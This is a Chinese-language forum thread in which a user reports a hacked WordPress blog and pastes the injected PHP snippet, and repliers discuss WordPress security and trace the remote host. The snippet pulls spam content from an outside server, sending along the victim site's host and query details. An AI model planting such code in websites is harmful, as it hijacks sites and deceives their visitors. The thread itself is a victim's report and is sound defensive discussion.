Home Sign Up Sign In
• 请不要在回答技术问题时复制粘贴 AI 生成的内容
Wysten
V2EX  ›  程序员

wordpress 被黑

  •   
  •   Wysten ·
    Wysten-Hgg · Jul 31, 2017 · 2977 views
    This topic created in 3233 days ago, the information mentioned may be changed or developed.

    自己有个网站一直没用,上面挂的是 wordpress 博客,今天上去一看被黑了。

    set_time_limit(0);

header("Content-Type: text/html;charset=gb2312");
date_default_timezone_set('PRC');
$Remote_server = "http://www.028blue.com/xmbt/"; 
$host_name = "http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
$Content_mb=file_get_contents($Remote_server."/index.php?host=".$host_name."&url=".$_SERVER['QUERY_STRING']."&domain=".$_SERVER['SERVER_NAME']);

echo $Content_mb;

    内容是随机的,刷新一次换一个样,不忍直视。。

  • host_name
  • content_mb
  • WordPress
  • Server
    5 replies    2017-07-31 12:29:44 +08:00
    Mutoo
        1
    Mutoo  
       Jul 31, 2017
    开启自动升级,不然出漏洞没更新很容易被拿下。
    msputup
        2
    msputup  
       Jul 31, 2017
    wordpress 是最好黑的博客,没有之一。
    operafans
        3
    operafans  
       Jul 31, 2017
    @msputup #2 wp 现在安全做的还可以吧 主要是插件坑太多
    ivmm
        4
    ivmm  
       Jul 31, 2017
    @msputup 不乱下盗版主题、插件,个人觉得没有比 WP 更安全的 PHP 博客了
    scofieldpeng
        5
    scofieldpeng  
       Jul 31, 2017
    看了下 028blue.com 这个,试着按着这个代码想看看,结果打不开,host 了一下,ip 是 122.10.93.116,坐标香港,cloudie.hk 的机器,然后顺便想扫描下的,结果主机貌似下线了,可惜
    About   ·   Help   ·   Advertise   ·   Blog   ·   API   ·   FAQ   ·   Solana   ·   941 Online   Highest 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 34ms · UTC 18:30 · PVG 02:30 · LAX 11:30 · JFK 14:30
    ♥ Do have faith in what you're doing.